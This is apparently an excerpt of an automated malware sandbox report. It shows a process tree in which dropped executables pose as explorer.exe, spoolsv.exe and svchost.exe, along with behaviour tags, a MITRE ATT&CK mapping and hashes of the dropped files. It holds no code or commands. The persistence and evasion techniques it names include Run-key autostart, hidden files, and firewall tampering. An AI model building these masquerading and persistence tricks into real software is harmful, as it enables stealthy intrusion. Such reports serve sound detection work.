\??\c:\windows\resources\themes\explorer.exec:\windows\resources\themes\explorer.exe3⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:744 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe SE4⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3080 -
\??\c:\windows\resources\svchost.exec:\windows\resources\svchost.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:368 -
\??\c:\windows\resources\spoolsv.exec:\windows\resources\spoolsv.exe PR6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:468
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
3Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
67KB
MD57574cf2c64f35161ab1292e2f532aabf
SHA114ba3fa927a06224dfe587014299e834def4644f
SHA256de055a89de246e629a8694bde18af2b1605e4b9b493c7e4aef669dd67acf5085
SHA5124db19f2d8d5bc1c7bbb812d3fa9c43b80fa22140b346d2760f090b73aed8a5177edb4bddc647a6ebd5a2db8565be5a1a36a602b0d759e38540d9a584ba5896ab
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5da5c82b0e070047f7377042d08093ff4
SHA189d05987cd60828cca516c5c40c18935c35e8bd3
SHA25677a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5
SHA5127360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b
-
Filesize
944B
MD5d8cb3e9459807e35f02130fad3f9860d
SHA15af7f32cb8a30e850892b15e9164030a041f4bd6
SHA2562b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184
-
Filesize
944B
MD5fd98baf5a9c30d41317663898985593b
SHA1ea300b99f723d2429d75a6c40e0838bf60f17aad
SHA2569d97a5bbc88fdcceac25f293383f7e5ce242675460ffbfb2ee9090870c034e96
SHA512bf4dbbd671b5d7afb326622a7c781f150860294d3dba7160330046c258c84a15981c70e50d84dc7faaa7cc8b8c90bf8df818b3f2d3806a8a3671dfe5e38fe7b0
-
Filesize
944B
MD5ce4540390cc4841c8973eb5a3e9f4f7d
SHA12293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA5122a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b
-
Filesize
944B
MD5c08aea9c78561a5f00398a723fdf2925
SHA12c880cbb5d02169a86bb9517ce2a0184cb177c6e
SHA25663d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7
SHA512d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c
-
Filesize
948B
MD59197d29c9cdd428de6779cc21470c149
SHA1396e39da26c195c6b0761395e1fe81efc44fc3d0
SHA25615cedd50c69bbf59e679e8c49a820c06465e15c024cfee6fdb9daacfc0755040
SHA512984f7866814b0fc051daf0c431b64511e5274999239ca3121ab02a5cf48b71de6d16c1d43f12714da869f28a8e6095abcb14931a95b17b3f646ec3d3280a5da4
-
Filesize
948B
MD5083782a87bd50ffc86d70cbc6f04e275
SHA10c11bc2b2c2cf33b17fff5e441881131ac1bee31
SHA2567a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f
SHA512a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02
-
Filesize
948B
MD5217d9191dfd67252cef23229676c9eda
SHA180d940b01c28e3933b9d68b3e567adc2bac1289f
SHA256e64811c3e57476bb644539824034cabe2cabcb88941122193e2af328f5eb2133
SHA51286767aa3c0eec425b7c6dbfd70a4a334fb5b1227c05fb06fbb3845e7b6974008386276f441c8e66e2bf9b0ae0a76133c4e5602211788cd702eaeadd12c5ff757
-
Filesize
948B
MD516841d208c2dd1e7a4e496d392fa2512
SHA12c2cc0c8b1e34ce10f50c321406f42b3b93666aa
SHA25629ca121acd239c6bda54ad1e87791c45a4bc1e247edffe0edaec86bdbaeb4a99
SHA5123b35ff95bdd1b22de4cb602c9f5bb67759c1f080943fe330377260a289c23f158dc617aec372d091e1ec995adbfca0b724c79ae1b1b653331c458cabbc7b3636
-
Filesize
948B
MD5e339c0ad3aca4c33b09c7c76ed797a15
SHA1774102d11041d48de215821b67686774605ae7c8
SHA2562a0aba6fbf082818826c0ccb8664909831bb8f9e79b92cc2a1b4c08c4932d04d
SHA51213e14f7de043df47570d8472666037180137a6afcb7b89e3b3164d60be7f322abce69dd5fbb3e203e01d0e23ffe77274358915d646323bb18b4d64520e69ec46
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD5eb1ad317bd25b55b2bbdce8a28a74a94
SHA198a3978be4d10d62e7411946474579ee5bdc5ea6
SHA2569e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
C:\Users\Admin\AppData\Local\Temp\09d0091bc0b4c65936e61195b2de83969f3be69bf404a9e9a7fe98148406bdba.exe
Filesize177KB
MD52898552d3a7845982c161116ad933d27
SHA102cc92d5df84b88648f6b7b69ac6c1aff574bef0
SHA2566e8c04f038f91e03bd97ce704a5c8c3da19836ea984fec10708c99e0a1a71f26
SHA512ca90a7396b4f0c582ef79f52c0c7a3de1fb53798291eda771f77f9b7bb36615e30d7d2443e34aa3b95b5529a645325adefff9f796fea421791e38a0e37f1851f
-
Filesize
4KB
MD5c9a8191ee366721dc76c094d31d507d1
SHA1396eb8e788fc82491b997b264b61a81ce6614b5a
SHA256d8622f7694a69be3f25b7e4f012cb56a2e4b6c1c358a9538ea54ea646a434a2b
SHA512eaa7e41b28891f88e6eccd108b7990642c0705c4ab9b1289778df693b8e33b31f728840d2d53397463849e3d7900e83b1a1aac26fd654e12a727a05472ff75bc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
135KB
MD54b39bff1e7aee2d6d6a3eca6a6334f91
SHA16feeded222d40849c93c2042a0bbe055a274d127
SHA2560eaf1cd7243e0017ab6be177ae739b2a48828b5039f801a6474fb8077427dc78
SHA512d6e83f4864c7c64e5e2c607a365bea4334ef2293091352bc745774b894a2b49034a9261aab36ea71b2d42a9293321a4d38c5be245387083a4bd1136ff6927911
-
Filesize
135KB
MD5809b156135c25258ad413ff6c2605f55
SHA162563abc9aa087013fca7aff5d7068f3335d5c26
SHA25693b6be77688a21d8e6e9122d304b9e048dc615724b76825f4be38d962b53239b
SHA5124a8f89e7fa88934f6336453a50b62809d60957419c2dfbe6f42b89a5322417da77387f4815724a4d88ca1433b6c8862fe13cc57683d5ef7cc6f3e3fd320bce1c
-
Filesize
135KB
MD5f3f9401477021d87f26aeba03824aa3c
SHA14a0720819e59e92f803b0558137f18540f6fbfcc
SHA256868cbabba8b46f3f1260c45b647a9af46ba2b7e33c417e264ad39cecb35a073c
SHA51256ccf1d21d06f19907a92a1c2c18cb7059a13065752683d506af35d606f7641174b76f8b857bd0cad7c13c294e43279ac48a6f0f89082ff375a00150b09cb066
-
Filesize
135KB
MD5c661ce167d242ba291368342b300e03d
SHA1a4d91df9f06c6078555af990ff284bc0dfefd640
SHA25664b2b643f9b3602f4a5b780ede9f95297956d599d7a1cc36a31e80a9ecea0ef5
SHA512da8fbd87591c074d9ca0e51d73542d2ba1444bbc2cdc36ddf633f9aa14daf2d8c3a67ed80ed3b9d4aa13eb5e30fb8c07ff081f91375040402eeb75937610dd17